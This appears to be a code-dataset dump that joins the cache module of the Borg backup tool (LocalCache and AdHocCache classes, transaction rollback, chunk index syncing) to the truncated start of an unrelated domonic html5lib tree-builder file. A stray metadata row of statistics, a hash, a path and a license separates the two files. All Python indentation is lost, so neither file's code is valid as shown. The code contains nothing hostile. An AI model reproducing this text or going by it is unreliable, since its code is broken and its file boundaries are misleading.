if self.lock is not None:
self.lock.release()
self.lock = None
def _check_upgrade(self, config_path):
try:
cache_version = self._config.getint('cache', 'version')
wanted_version = 1
if cache_version != wanted_version:
self.close()
raise Exception('%s has unexpected cache version %d (wanted: %d).' %
(config_path, cache_version, wanted_version))
except configparser.NoSectionError:
self.close()
raise Exception('%s does not look like a Borg cache.' % config_path) from None
class Cache:
"""Client Side cache
"""
class RepositoryIDNotUnique(Error):
"""Cache is newer than repository - do you have multiple, independently updated repos with same ID?"""
class RepositoryReplay(Error):
"""Cache, or information obtained from the security directory is newer than repository - this is either an attack or unsafe (multiple repos with same ID)"""
class CacheInitAbortedError(Error):
"""Cache initialization aborted"""
class RepositoryAccessAborted(Error):
"""Repository access aborted"""
class EncryptionMethodMismatch(Error):
"""Repository encryption method changed since last access, refusing to continue"""
@staticmethod
def break_lock(repository, path=None):
path = cache_dir(repository, path)
Lock(os.path.join(path, 'lock'), exclusive=True).break_lock()
@staticmethod
def destroy(repository, path=None):
"""destroy the cache for ``repository`` or at ``path``"""
path = path or os.path.join(get_cache_dir(), repository.id_str)
config = os.path.join(path, 'config')
if os.path.exists(config):
os.remove(config) # kill config first
shutil.rmtree(path)
def __new__(cls, repository, key, manifest, path=None, sync=True, warn_if_unencrypted=True,
progress=False, lock_wait=None, permit_adhoc_cache=False, cache_mode=DEFAULT_FILES_CACHE_MODE):
def local():
return LocalCache(repository=repository, key=key, manifest=manifest, path=path, sync=sync,
warn_if_unencrypted=warn_if_unencrypted, progress=progress,
lock_wait=lock_wait, cache_mode=cache_mode)
def adhoc():
return AdHocCache(repository=repository, key=key, manifest=manifest, lock_wait=lock_wait)
if not permit_adhoc_cache:
return local()
# ad-hoc cache may be permitted, but if the local cache is in sync it'd be stupid to invalidate
# it by needlessly using the ad-hoc cache.
# Check if the local cache exists and is in sync.
cache_config = CacheConfig(repository, path, lock_wait)
if cache_config.exists():
with cache_config:
cache_in_sync = cache_config.manifest_id == manifest.id
# Don't nest cache locks
if cache_in_sync:
# Local cache is in sync, use it
logger.debug('Cache: choosing local cache (in sync)')
return local()
logger.debug('Cache: choosing ad-hoc cache (local cache does not exist or is not in sync)')
return adhoc()
class CacheStatsMixin:
str_format = """\
All archives: {0.total_size:>20s} {0.total_csize:>20s} {0.unique_csize:>20s}
Unique chunks Total chunks
Chunk index: {0.total_unique_chunks:20d} {0.total_chunks:20d}"""
def __str__(self):
return self.str_format.format(self.format_tuple())
Summary = namedtuple('Summary', ['total_size', 'total_csize', 'unique_size', 'unique_csize', 'total_unique_chunks',
'total_chunks'])
def stats(self):
# XXX: this should really be moved down to `hashindex.pyx`
stats = self.Summary(*self.chunks.summarize())._asdict()
return stats
def format_tuple(self):
stats = self.stats()
for field in ['total_size', 'total_csize', 'unique_csize']:
stats[field] = format_file_size(stats[field])
return self.Summary(**stats)
def chunks_stored_size(self):
return self.stats()['unique_csize']
class LocalCache(CacheStatsMixin):
"""
Persistent, local (client-side) cache.
"""
def __init__(self, repository, key, manifest, path=None, sync=True, warn_if_unencrypted=True,
progress=False, lock_wait=None, cache_mode=DEFAULT_FILES_CACHE_MODE):
"""
:param warn_if_unencrypted: print warning if accessing unknown unencrypted repository
:param lock_wait: timeout for lock acquisition (int [s] or None [wait forever])
:param sync: do :meth:`.sync`
:param cache_mode: what shall be compared in the file stat infos vs. cached stat infos comparison
"""
self.repository = repository
self.key = key
self.manifest = manifest
self.progress = progress
self.cache_mode = cache_mode
self.timestamp = None
self.txn_active = False
self.path = cache_dir(repository, path)
self.security_manager = SecurityManager(repository)
self.cache_config = CacheConfig(self.repository, self.path, lock_wait)
# Warn user before sending data to a never seen before unencrypted repository
if not os.path.exists(self.path):
self.security_manager.assert_access_unknown(warn_if_unencrypted, manifest, key)
self.create()
self.open()
try:
self.security_manager.assert_secure(manifest, key, cache_config=self.cache_config)
if not self.check_cache_compatibility():
self.wipe_cache()
self.update_compatibility()
if sync and self.manifest.id != self.cache_config.manifest_id:
self.sync()
self.commit()
except:
self.close()
raise
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def create(self):
"""Create a new empty cache at `self.path`
"""
os.makedirs(self.path)
with open(os.path.join(self.path, 'README'), 'w') as fd:
fd.write(CACHE_README)
self.cache_config.create()
ChunkIndex().write(os.path.join(self.path, 'chunks'))
os.makedirs(os.path.join(self.path, 'chunks.archive.d'))
with SaveFile(os.path.join(self.path, 'files'), binary=True):
pass # empty file
def _do_open(self):
self.cache_config.load()
with IntegrityCheckedFile(path=os.path.join(self.path, 'chunks'), write=False,
integrity_data=self.cache_config.integrity.get('chunks')) as fd:
self.chunks = ChunkIndex.read(fd)
if 'd' in self.cache_mode: # d(isabled)
self.files = None
else:
self._read_files()
def open(self):
if not os.path.isdir(self.path):
            raise Exception('%s does not look like a Borg cache' % self.path)
self.cache_config.open()
self.rollback()
def close(self):
if self.cache_config is not None:
self.cache_config.close()
self.cache_config = None
def _read_files(self):
self.files = {}
self._newest_cmtime = None
logger.debug('Reading files cache ...')
msg = None
try:
with IntegrityCheckedFile(path=os.path.join(self.path, 'files'), write=False,
integrity_data=self.cache_config.integrity.get('files')) as fd:
u = msgpack.Unpacker(use_list=True)
while True:
data = fd.read(64 * 1024)
if not data:
break
u.feed(data)
try:
for path_hash, item in u:
entry = FileCacheEntry(*item)
# in the end, this takes about 240 Bytes per file
self.files[path_hash] = msgpack.packb(entry._replace(age=entry.age + 1))
except (TypeError, ValueError) as exc:
msg = "The files cache seems invalid. [%s]" % str(exc)
break
except OSError as exc:
msg = "The files cache can't be read. [%s]" % str(exc)
except FileIntegrityError as fie:
msg = "The files cache is corrupted. [%s]" % str(fie)
if msg is not None:
logger.warning(msg)
logger.warning('Continuing without files cache - expect lower performance.')
self.files = {}
def begin_txn(self):
# Initialize transaction snapshot
pi = ProgressIndicatorMessage(msgid='cache.begin_transaction')
txn_dir = os.path.join(self.path, 'txn.tmp')
os.mkdir(txn_dir)
pi.output('Initializing cache transaction: Reading config')
shutil.copy(os.path.join(self.path, 'config'), txn_dir)
pi.output('Initializing cache transaction: Reading chunks')
shutil.copy(os.path.join(self.path, 'chunks'), txn_dir)
pi.output('Initializing cache transaction: Reading files')
shutil.copy(os.path.join(self.path, 'files'), txn_dir)
os.rename(os.path.join(self.path, 'txn.tmp'),
os.path.join(self.path, 'txn.active'))
self.txn_active = True
pi.finish()
def commit(self):
"""Commit transaction
"""
if not self.txn_active:
return
self.security_manager.save(self.manifest, self.key)
pi = ProgressIndicatorMessage(msgid='cache.commit')
if self.files is not None:
if self._newest_cmtime is None:
# was never set because no files were modified/added
self._newest_cmtime = 2 ** 63 - 1 # nanoseconds, good until y2262
ttl = int(os.environ.get('BORG_FILES_CACHE_TTL', 20))
pi.output('Saving files cache')
with IntegrityCheckedFile(path=os.path.join(self.path, 'files'), write=True) as fd:
for path_hash, item in self.files.items():
# Only keep files seen in this backup that are older than newest cmtime seen in this backup -
# this is to avoid issues with filesystem snapshots and cmtime granularity.
# Also keep files from older backups that have not reached BORG_FILES_CACHE_TTL yet.
entry = FileCacheEntry(*msgpack.unpackb(item))
if entry.age == 0 and bigint_to_int(entry.cmtime) < self._newest_cmtime or \
entry.age > 0 and entry.age < ttl:
msgpack.pack((path_hash, entry), fd)
self.cache_config.integrity['files'] = fd.integrity_data
pi.output('Saving chunks cache')
with IntegrityCheckedFile(path=os.path.join(self.path, 'chunks'), write=True) as fd:
self.chunks.write(fd)
self.cache_config.integrity['chunks'] = fd.integrity_data
pi.output('Saving cache config')
self.cache_config.save(self.manifest, self.key)
os.rename(os.path.join(self.path, 'txn.active'),
os.path.join(self.path, 'txn.tmp'))
shutil.rmtree(os.path.join(self.path, 'txn.tmp'))
self.txn_active = False
pi.finish()
def rollback(self):
"""Roll back partial and aborted transactions
"""
# Remove partial transaction
if os.path.exists(os.path.join(self.path, 'txn.tmp')):
shutil.rmtree(os.path.join(self.path, 'txn.tmp'))
# Roll back active transaction
txn_dir = os.path.join(self.path, 'txn.active')
if os.path.exists(txn_dir):
shutil.copy(os.path.join(txn_dir, 'config'), self.path)
shutil.copy(os.path.join(txn_dir, 'chunks'), self.path)
shutil.copy(os.path.join(txn_dir, 'files'), self.path)
os.rename(txn_dir, os.path.join(self.path, 'txn.tmp'))
if os.path.exists(os.path.join(self.path, 'txn.tmp')):
shutil.rmtree(os.path.join(self.path, 'txn.tmp'))
self.txn_active = False
self._do_open()
def sync(self):
"""Re-synchronize chunks cache with repository.
Maintains a directory with known backup archive indexes, so it only
needs to fetch infos from repo and build a chunk index once per backup
archive.
If out of sync, missing archive indexes get added, outdated indexes
get removed and a new master chunks index is built by merging all
archive indexes.
"""
archive_path = os.path.join(self.path, 'chunks.archive.d')
# An index of chunks whose size had to be fetched
chunks_fetched_size_index = ChunkIndex()
# Instrumentation
processed_item_metadata_bytes = 0
processed_item_metadata_chunks = 0
compact_chunks_archive_saved_space = 0
fetched_chunks_for_csize = 0
fetched_bytes_for_csize = 0
def mkpath(id, suffix=''):
id_hex = bin_to_hex(id)
path = os.path.join(archive_path, id_hex + suffix)
return path
def cached_archives():
if self.do_cache:
fns = os.listdir(archive_path)
# filenames with 64 hex digits == 256bit,
# or compact indices which are 64 hex digits + ".compact"
return set(unhexlify(fn) for fn in fns if len(fn) == 64) | \
set(unhexlify(fn[:64]) for fn in fns if len(fn) == 72 and fn.endswith('.compact'))
else:
return set()
def repo_archives():
return set(info.id for info in self.manifest.archives.list())
def cleanup_outdated(ids):
for id in ids:
cleanup_cached_archive(id)
def cleanup_cached_archive(id, cleanup_compact=True):
try:
os.unlink(mkpath(id))
os.unlink(mkpath(id) + '.integrity')
except FileNotFoundError:
pass
if not cleanup_compact:
return
try:
os.unlink(mkpath(id, suffix='.compact'))
os.unlink(mkpath(id, suffix='.compact') + '.integrity')
except FileNotFoundError:
pass
def fetch_missing_csize(chunk_idx):
"""
Archives created with AdHocCache will have csize=0 in all chunk list entries whose
chunks were already in the repository.
Scan *chunk_idx* for entries where csize=0 and fill in the correct information.
"""
nonlocal fetched_chunks_for_csize
nonlocal fetched_bytes_for_csize
all_missing_ids = chunk_idx.zero_csize_ids()
fetch_ids = []
if len(chunks_fetched_size_index):
for id_ in all_missing_ids:
already_fetched_entry = chunks_fetched_size_index.get(id_)
if already_fetched_entry:
entry = chunk_idx[id_]._replace(csize=already_fetched_entry.csize)
assert entry.size == already_fetched_entry.size, 'Chunk size mismatch'
chunk_idx[id_] = entry
else:
fetch_ids.append(id_)
else:
fetch_ids = all_missing_ids
# This is potentially a rather expensive operation, but it's hard to tell at this point
# if it's a problem in practice (hence the experimental status of --no-cache-sync).
for id_, data in zip(fetch_ids, decrypted_repository.repository.get_many(fetch_ids)):
entry = chunk_idx[id_]._replace(csize=len(data))
chunk_idx[id_] = entry
chunks_fetched_size_index[id_] = entry
fetched_chunks_for_csize += 1
fetched_bytes_for_csize += len(data)
def fetch_and_build_idx(archive_id, decrypted_repository, chunk_idx):
nonlocal processed_item_metadata_bytes
nonlocal processed_item_metadata_chunks
csize, data = decrypted_repository.get(archive_id)
chunk_idx.add(archive_id, 1, len(data), csize)
archive = ArchiveItem(internal_dict=msgpack.unpackb(data))
if archive.version != 1:
raise Exception('Unknown archive metadata version')
sync = CacheSynchronizer(chunk_idx)
for item_id, (csize, data) in zip(archive.items, decrypted_repository.get_many(archive.items)):
chunk_idx.add(item_id, 1, len(data), csize)
processed_item_metadata_bytes += len(data)
processed_item_metadata_chunks += 1
sync.feed(data)
if self.do_cache:
fetch_missing_csize(chunk_idx)
write_archive_index(archive_id, chunk_idx)
def write_archive_index(archive_id, chunk_idx):
nonlocal compact_chunks_archive_saved_space
compact_chunks_archive_saved_space += chunk_idx.compact()
fn = mkpath(archive_id, suffix='.compact')
fn_tmp = mkpath(archive_id, suffix='.tmp')
try:
with DetachedIntegrityCheckedFile(path=fn_tmp, write=True,
filename=bin_to_hex(archive_id) + '.compact') as fd:
chunk_idx.write(fd)
except Exception:
truncate_and_unlink(fn_tmp)
else:
os.rename(fn_tmp, fn)
def read_archive_index(archive_id, archive_name):
archive_chunk_idx_path = mkpath(archive_id)
logger.info("Reading cached archive chunk index for %s ...", archive_name)
try:
try:
# Attempt to load compact index first
with DetachedIntegrityCheckedFile(path=archive_chunk_idx_path + '.compact', write=False) as fd:
archive_chunk_idx = ChunkIndex.read(fd, permit_compact=True)
# In case a non-compact index exists, delete it.
cleanup_cached_archive(archive_id, cleanup_compact=False)
# Compact index read - return index, no conversion necessary (below).
return archive_chunk_idx
except FileNotFoundError:
# No compact index found, load non-compact index, and convert below.
with DetachedIntegrityCheckedFile(path=archive_chunk_idx_path, write=False) as fd:
archive_chunk_idx = ChunkIndex.read(fd)
except FileIntegrityError as fie:
logger.error('Cached archive chunk index of %s is corrupted: %s', archive_name, fie)
# Delete corrupted index, set warning. A new index must be build.
cleanup_cached_archive(archive_id)
set_ec(EXIT_WARNING)
return None
# Convert to compact index. Delete the existing index first.
logger.debug('Found non-compact index for %s, converting to compact.', archive_name)
cleanup_cached_archive(archive_id)
write_archive_index(archive_id, archive_chunk_idx)
return archive_chunk_idx
def get_archive_ids_to_names(archive_ids):
# Pass once over all archives and build a mapping from ids to names.
# The easier approach, doing a similar loop for each archive, has
# square complexity and does about a dozen million functions calls
# with 1100 archives (which takes 30s CPU seconds _alone_).
archive_names = {}
for info in self.manifest.archives.list():
if info.id in archive_ids:
archive_names[info.id] = info.name
assert len(archive_names) == len(archive_ids)
return archive_names
def create_master_idx(chunk_idx):
logger.info('Synchronizing chunks cache...')
cached_ids = cached_archives()
archive_ids = repo_archives()
logger.info('Archives: %d, w/ cached Idx: %d, w/ outdated Idx: %d, w/o cached Idx: %d.',
len(archive_ids), len(cached_ids),
len(cached_ids - archive_ids), len(archive_ids - cached_ids))
# deallocates old hashindex, creates empty hashindex:
chunk_idx.clear()
cleanup_outdated(cached_ids - archive_ids)
# Explicitly set the usable initial hash table capacity to avoid performance issues
# due to hash table "resonance".
master_index_capacity = len(self.repository)
if archive_ids:
chunk_idx = None if not self.do_cache else ChunkIndex(usable=master_index_capacity)
pi = ProgressIndicatorPercent(total=len(archive_ids), step=0.1,
msg='%3.0f%% Syncing chunks cache. Processing archive %s',
msgid='cache.sync')
archive_ids_to_names = get_archive_ids_to_names(archive_ids)
for archive_id, archive_name in archive_ids_to_names.items():
pi.show(info=[remove_surrogates(archive_name)])
if self.do_cache:
if archive_id in cached_ids:
archive_chunk_idx = read_archive_index(archive_id, archive_name)
if archive_chunk_idx is None:
cached_ids.remove(archive_id)
if archive_id not in cached_ids:
# Do not make this an else branch; the FileIntegrityError exception handler
# above can remove *archive_id* from *cached_ids*.
logger.info('Fetching and building archive index for %s ...', archive_name)
archive_chunk_idx = ChunkIndex()
fetch_and_build_idx(archive_id, decrypted_repository, archive_chunk_idx)
logger.info("Merging into master chunks index ...")
chunk_idx.merge(archive_chunk_idx)
else:
chunk_idx = chunk_idx or ChunkIndex(usable=master_index_capacity)
logger.info('Fetching archive index for %s ...', archive_name)
fetch_and_build_idx(archive_id, decrypted_repository, chunk_idx)
if not self.do_cache:
fetch_missing_csize(chunk_idx)
pi.finish()
logger.debug('Cache sync: had to fetch %s (%d chunks) because no archive had a csize set for them '
'(due to --no-cache-sync)',
format_file_size(fetched_bytes_for_csize), fetched_chunks_for_csize)
logger.debug('Cache sync: processed %s (%d chunks) of metadata',
format_file_size(processed_item_metadata_bytes), processed_item_metadata_chunks)
logger.debug('Cache sync: compact chunks.archive.d storage saved %s bytes',
format_file_size(compact_chunks_archive_saved_space))
logger.info('Done.')
return chunk_idx
def legacy_cleanup():
"""bring old cache dirs into the desired state (cleanup and adapt)"""
try:
os.unlink(os.path.join(self.path, 'chunks.archive'))
except:
pass
try:
os.unlink(os.path.join(self.path, 'chunks.archive.tmp'))
except:
pass
try:
os.mkdir(archive_path)
except:
pass
# The cache can be used by a command that e.g. only checks against Manifest.Operation.WRITE,
# which does not have to include all flags from Manifest.Operation.READ.
# Since the sync will attempt to read archives, check compatibility with Manifest.Operation.READ.
self.manifest.check_repository_compatibility((Manifest.Operation.READ, ))
self.begin_txn()
with cache_if_remote(self.repository, decrypted_cache=self.key) as decrypted_repository:
legacy_cleanup()
# TEMPORARY HACK: to avoid archive index caching, create a FILE named ~/.cache/borg/REPOID/chunks.archive.d -
# this is only recommended if you have a fast, low latency connection to your repo (e.g. if repo is local disk)
self.do_cache = os.path.isdir(archive_path)
self.chunks = create_master_idx(self.chunks)
def check_cache_compatibility(self):
my_features = Manifest.SUPPORTED_REPO_FEATURES
if self.cache_config.ignored_features & my_features:
# The cache might not contain references of chunks that need a feature that is mandatory for some operation
# and which this version supports. To avoid corruption while executing that operation force rebuild.
return False
if not self.cache_config.mandatory_features <= my_features:
# The cache was build with consideration to at least one feature that this version does not understand.
# This client might misinterpret the cache. Thus force a rebuild.
return False
return True
def wipe_cache(self):
logger.warning("Discarding incompatible cache and forcing a cache rebuild")
archive_path = os.path.join(self.path, 'chunks.archive.d')
if os.path.isdir(archive_path):
shutil.rmtree(os.path.join(self.path, 'chunks.archive.d'))
os.makedirs(os.path.join(self.path, 'chunks.archive.d'))
self.chunks = ChunkIndex()
with SaveFile(os.path.join(self.path, 'files'), binary=True):
pass # empty file
self.cache_config.manifest_id = ''
self.cache_config._config.set('cache', 'manifest', '')
self.cache_config.ignored_features = set()
self.cache_config.mandatory_features = set()
def update_compatibility(self):
operation_to_features_map = self.manifest.get_all_mandatory_features()
my_features = Manifest.SUPPORTED_REPO_FEATURES
repo_features = set()
for operation, features in operation_to_features_map.items():
repo_features.update(features)
self.cache_config.ignored_features.update(repo_features - my_features)
self.cache_config.mandatory_features.update(repo_features & my_features)
def add_chunk(self, id, chunk, stats, overwrite=False, wait=True):
if not self.txn_active:
self.begin_txn()
size = len(chunk)
refcount = self.seen_chunk(id, size)
if refcount and not overwrite:
return self.chunk_incref(id, stats)
data = self.key.encrypt(chunk)
csize = len(data)
self.repository.put(id, data, wait=wait)
self.chunks.add(id, 1, size, csize)
stats.update(size, csize, not refcount)
return ChunkListEntry(id, size, csize)
def seen_chunk(self, id, size=None):
refcount, stored_size, _ = self.chunks.get(id, ChunkIndexEntry(0, None, None))
if size is not None and stored_size is not None and size != stored_size:
# we already have a chunk with that id, but different size.
# this is either a hash collision (unlikely) or corruption or a bug.
raise Exception("chunk has same id [%r], but different size (stored: %d new: %d)!" % (
id, stored_size, size))
return refcount
def chunk_incref(self, id, stats, size=None, part=False):
if not self.txn_active:
self.begin_txn()
count, _size, csize = self.chunks.incref(id)
stats.update(_size, csize, False, part=part)
return ChunkListEntry(id, _size, csize)
def chunk_decref(self, id, stats, wait=True):
if not self.txn_active:
self.begin_txn()
count, size, csize = self.chunks.decref(id)
if count == 0:
del self.chunks[id]
self.repository.delete(id, wait=wait)
stats.update(-size, -csize, True)
else:
stats.update(-size, -csize, False)
def file_known_and_unchanged(self, path_hash, st):
"""
Check if we know the file that has this path_hash (know == it is in our files cache) and
whether it is unchanged (the size/inode number/cmtime is same for stuff we check in this cache_mode).
:param path_hash: hash(file_path), to save some memory in the files cache
:param st: the file's stat() result
:return: known, ids (known is True if we have infos about this file in the cache,
ids is the list of chunk ids IF the file has not changed, otherwise None).
"""
cache_mode = self.cache_mode
if 'd' in cache_mode or not stat.S_ISREG(st.st_mode): # d(isabled)
return False, None
# note: r(echunk) does not need the files cache in this method, but the files cache will
# be updated and saved to disk to memorize the files. To preserve previous generations in
# the cache, this means that it also needs to get loaded from disk first.
if 'r' in cache_mode: # r(echunk)
return False, None
entry = self.files.get(path_hash)
if not entry:
return False, None
# we know the file!
entry = FileCacheEntry(*msgpack.unpackb(entry))
if 's' in cache_mode and entry.size != st.st_size:
return True, None
if 'i' in cache_mode and entry.inode != st.st_ino:
return True, None
if 'c' in cache_mode and bigint_to_int(entry.cmtime) != st.st_ctime_ns:
return True, None
elif 'm' in cache_mode and bigint_to_int(entry.cmtime) != st.st_mtime_ns:
return True, None
# we ignored the inode number in the comparison above or it is still same.
# if it is still the same, replacing it in the tuple doesn't change it.
# if we ignored it, a reason for doing that is that files were moved to a new
# disk / new fs (so a one-time change of inode number is expected) and we wanted
# to avoid everything getting chunked again. to be able to re-enable the inode
# number comparison in a future backup run (and avoid chunking everything
# again at that time), we need to update the inode number in the cache with what
# we see in the filesystem.
self.files[path_hash] = msgpack.packb(entry._replace(inode=st.st_ino, age=0))
return True, entry.chunk_ids
def memorize_file(self, path_hash, st, ids):
cache_mode = self.cache_mode
# note: r(echunk) modes will update the files cache, d(isabled) mode won't
if 'd' in cache_mode or not stat.S_ISREG(st.st_mode):
return
if 'c' in cache_mode:
cmtime_ns = safe_ns(st.st_ctime_ns)
elif 'm' in cache_mode:
cmtime_ns = safe_ns(st.st_mtime_ns)
entry = FileCacheEntry(age=0, inode=st.st_ino, size=st.st_size, cmtime=int_to_bigint(cmtime_ns), chunk_ids=ids)
self.files[path_hash] = msgpack.packb(entry)
self._newest_cmtime = max(self._newest_cmtime or 0, cmtime_ns)
class AdHocCache(CacheStatsMixin):
"""
Ad-hoc, non-persistent cache.
Compared to the standard LocalCache the AdHocCache does not maintain accurate reference count,
nor does it provide a files cache (which would require persistence). Chunks that were not added
during the current AdHocCache lifetime won't have correct size/csize set (0 bytes) and will
have an infinite reference count (MAX_VALUE).
"""
str_format = """\
All archives: unknown unknown unknown
Unique chunks Total chunks
Chunk index: {0.total_unique_chunks:20d} unknown"""
def __init__(self, repository, key, manifest, warn_if_unencrypted=True, lock_wait=None):
self.repository = repository
self.key = key
self.manifest = manifest
self._txn_active = False
self.security_manager = SecurityManager(repository)
self.security_manager.assert_secure(manifest, key, lock_wait=lock_wait)
logger.warning('Note: --no-cache-sync is an experimental feature.')
# Public API
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
files = None
cache_mode = 'd'
def file_known_and_unchanged(self, path_hash, st):
return False, None
def memorize_file(self, path_hash, st, ids):
pass
def add_chunk(self, id, chunk, stats, overwrite=False, wait=True):
assert not overwrite, 'AdHocCache does not permit overwrites — trying to use it for recreate?'
if not self._txn_active:
self.begin_txn()
size = len(chunk)
refcount = self.seen_chunk(id, size)
if refcount:
return self.chunk_incref(id, stats, size=size)
data = self.key.encrypt(chunk)
csize = len(data)
self.repository.put(id, data, wait=wait)
self.chunks.add(id, 1, size, csize)
stats.update(size, csize, not refcount)
return ChunkListEntry(id, size, csize)
def seen_chunk(self, id, size=None):
if not self._txn_active:
self.begin_txn()
entry = self.chunks.get(id, ChunkIndexEntry(0, None, None))
if entry.refcount and size and not entry.size:
# The LocalCache has existing size information and uses *size* to make an effort at detecting collisions.
# This is of course not possible for the AdHocCache.
# Here *size* is used to update the chunk's size information, which will be zero for existing chunks.
self.chunks[id] = entry._replace(size=size)
return entry.refcount
def chunk_incref(self, id, stats, size=None, part=False):
if not self._txn_active:
self.begin_txn()
count, _size, csize = self.chunks.incref(id)
# When _size is 0 and size is not given, then this chunk has not been locally visited yet (seen_chunk with
# size or add_chunk); we can't add references to those (size=0 is invalid) and generally don't try to.
size = _size or size
assert size
stats.update(size, csize, False, part=part)
return ChunkListEntry(id, size, csize)
def chunk_decref(self, id, stats, wait=True):
if not self._txn_active:
self.begin_txn()
count, size, csize = self.chunks.decref(id)
if count == 0:
del self.chunks[id]
self.repository.delete(id, wait=wait)
stats.update(-size, -csize, True)
else:
stats.update(-size, -csize, False)
def commit(self):
if not self._txn_active:
return
self.security_manager.save(self.manifest, self.key)
self._txn_active = False
def rollback(self):
self._txn_active = False
del self.chunks
def begin_txn(self):
self._txn_active = True
# Explicitly set the initial usable hash table capacity to avoid performance issues
# due to hash table "resonance".
# Since we're creating an archive, add 10 % from the start.
num_chunks = len(self.repository)
self.chunks = ChunkIndex(usable=num_chunks * 1.1)
pi = ProgressIndicatorPercent(total=num_chunks, msg='Downloading chunk list... %3.0f%%',
msgid='cache.download_chunks')
t0 = perf_counter()
num_requests = 0
marker = None
while True:
result = self.repository.list(limit=LIST_SCAN_LIMIT, marker=marker)
num_requests += 1
if not result:
break
pi.show(increase=len(result))
marker = result[-1]
# All chunks from the repository have a refcount of MAX_VALUE, which is sticky,
# therefore we can't/won't delete them. Chunks we added ourselves in this transaction
# (e.g. checkpoint archives) are tracked correctly.
init_entry = ChunkIndexEntry(refcount=ChunkIndex.MAX_VALUE, size=0, csize=0)
for id_ in result:
self.chunks[id_] = init_entry
assert len(self.chunks) == num_chunks
# LocalCache does not contain the manifest, either.
del self.chunks[self.manifest.MANIFEST_ID]
duration = perf_counter() - t0 or 0.01
pi.finish()
logger.debug('AdHocCache: downloaded %d chunk IDs in %.2f s (%d requests), ~%s/s',
num_chunks, duration, num_requests, format_file_size(num_chunks * 34 / duration))
# Chunk IDs in a list are encoded in 34 bytes: 1 byte msgpack header, 1 byte length, 32 ID bytes.
# Protocol overhead is neglected in this calculation.
| 46.90583 | 164 | 0.62652 |
3b7cf64bf1f795c1bf4e5edd8f4285df941d1b3a | 11,538 | py | Python | domonic/ext/html5lib_/__init__.py | ArjixWasTaken/domonic | b80433af8c3172b8a15cb62eeca4e6c5add8cb7e | [
"MIT"
] | null | null | null | domonic/ext/html5lib_/__init__.py | ArjixWasTaken/domonic | b80433af8c3172b8a15cb62eeca4e6c5add8cb7e | [
"MIT"
] | null | null | null | domonic/ext/html5lib_/__init__.py | ArjixWasTaken/domonic | b80433af8c3172b8a15cb62eeca4e6c5add8cb7e | [
"MIT"
] | null | null | null | """
domonic.ext.html5lib_
====================================
stolen from here and modded to work with domonic instead of mindidom
https://github.com/html5lib/html5lib-python/blob/master/html5lib/treebuilders/__init__.py
"""
'''
from __future__ import absolute_import, division, unicode_literals
# from .._utils import default_etree
treeBuilderCache = {}
def getTreeBuilder(treeType, implementation='domonic', **kwargs):
treeType = treeType.lower()
if treeType not in treeBuilderCache:
if treeType == "domonic":
from . import dom
if implementation is None:
from xml.dom import minidom
implementation = minidom
return dom.getDomModule(implementation, **kwargs).TreeBuilder
else:
raise ValueError("""domonic treebuilder required "%s" """ % treeType)
return treeBuilderCache.get(treeType)
'''
# from __future__ import absolute_import, division, unicode_literals
try:
from collections.abc import MutableMapping
except ImportError: # Python 2.7
from collections import MutableMapping
# from xml.dom import minidom, Node
import weakref
from html5lib import constants
from html5lib._utils import moduleFactoryFactory
from html5lib.constants import namespaces
from html5lib.treebuilders import base
from domonic.dom import DOMImplementation, Node
# from . import base
# from .. import constants
# from ..constants import namespaces
# from .._utils import moduleFactoryFactory
# def getDomBuilder(DomImplementation):
# Dom = DomImplementation
def getDomBuilder(ignore):
# Dom = DomImplementation
class AttrList(MutableMapping):
def __init__(self, element):
self.element = element
def __iter__(self):
return iter(self.element.attributes.keys())
def __setitem__(self, name, value):
if isinstance(name, tuple):
raise NotImplementedError
else:
attr = self.element.ownerDocument.createAttribute(name)
attr.value = value
self.element.attributes[name] = attr
def __len__(self):
return len(self.element.attributes)
def items(self):
# print(self.element, self.element.attributes)
# return list(self.element.attributes.items())
return list(self.element.attributes.items())
# return self.element.attributes
def values(self):
return list(self.element.attributes.values())
def __getitem__(self, name):
if isinstance(name, tuple):
raise NotImplementedError
else:
# print(self.element)
# print(self.element.attributes, name)
try:
return self.element.attributes[name].value
except Exception as e:
# print(e)
# print('failed on :', name) # TODO
return ""
def __delitem__(self, name):
if isinstance(name, tuple):
raise NotImplementedError
else:
del self.element.attributes[name]
class NodeBuilder(base.Node):
def __init__(self, element):
# NOTE requires tagname to be correct as it checks that against keys in namespaces.
# i.e '#document' needs to be converted to 'html'.
# base.Node.__init__(self, element.nodeName)
base.Node.__init__(self, element.name)
self.element = element
namespace = property(lambda self: hasattr(self.element, "namespaceURI") and self.element.namespaceURI or None)
def appendChild(self, node):
node.parent = self
self.element.appendChild(node.element)
def insertText(self, data, insertBefore=None):
# Dont create empty text nodes
if data.isspace():
return
text = self.element.ownerDocument.createTextNode(data)
if insertBefore:
self.element.insertBefore(text, insertBefore.element)
else:
self.element.appendChild(text)
def insertBefore(self, node, refNode):
self.element.insertBefore(node.element, refNode.element)
node.parent = self
def removeChild(self, node):
if node.element.parentNode == self.element:
self.element.removeChild(node.element)
node.parent = None
def reparentChildren(self, newParent):
while self.element.hasChildNodes():
child = self.element.firstChild
self.element.removeChild(child)
newParent.element.appendChild(child)
self.childNodes = []
def getAttributes(self):
return AttrList(self.element)
def setAttributes(self, attributes):
if attributes:
for name, value in list(attributes.items()):
if isinstance(name, tuple):
if name[0] is not None:
qualifiedName = name[0] + ":" + name[1]
else:
qualifiedName = name[1]
self.element.setAttributeNS(name[2], qualifiedName, value)
else:
self.element.setAttribute(name, value)
attributes = property(getAttributes, setAttributes)
def cloneNode(self):
return NodeBuilder(self.element.cloneNode(False))
def hasContent(self):
return self.element.hasChildNodes()
def getNameTuple(self):
if self.namespace is None:
return namespaces["html"], self.name
else:
return self.namespace, self.name
nameTuple = property(getNameTuple)
class TreeBuilder(base.TreeBuilder): # pylint:disable=unused-variable
def documentClass(self):
# self.dom = Dom.getDOMImplementation().createDocument(None, None, None)
self.dom = DOMImplementation().createDocument(None, None, None)
return weakref.proxy(self)
def insertDoctype(self, token):
name = token["name"]
publicId = token["publicId"]
systemId = token["systemId"]
# domimpl = Dom.getDOMImplementation()
domimpl = DOMImplementation()
doctype = domimpl.createDocumentType(name, publicId, systemId)
self.document.appendChild(NodeBuilder(doctype))
# if Dom == minidom:
doctype.ownerDocument = self.dom
def elementClass(self, name, namespace=None):
if namespace is None and self.defaultNamespace is None:
node = self.dom.createElement(name)
else:
node = self.dom.createElementNS(namespace, name)
return NodeBuilder(node)
def commentClass(self, data):
return NodeBuilder(self.dom.createComment(data))
def fragmentClass(self):
